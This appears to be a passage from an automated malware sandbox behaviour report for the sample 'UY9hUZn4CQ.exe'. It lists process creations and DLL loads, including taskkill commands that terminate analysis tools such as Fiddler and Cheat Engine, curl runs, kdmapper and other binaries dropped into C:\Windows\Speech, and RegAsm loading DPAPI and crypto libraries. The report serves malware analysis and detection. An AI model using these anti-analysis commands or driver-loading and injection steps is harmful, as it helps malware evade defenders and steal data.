Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\Speech\imxyvi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: version.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dxgidebug.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sspicli.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: riched20.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: usp10.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msls31.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textshaping.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wldp.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: propsys.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: profapi.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: edputil.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: urlmon.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: iertutil.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: srvcli.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: netutils.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: policymanager.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: appresolver.dll
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: bcp47langs.dll
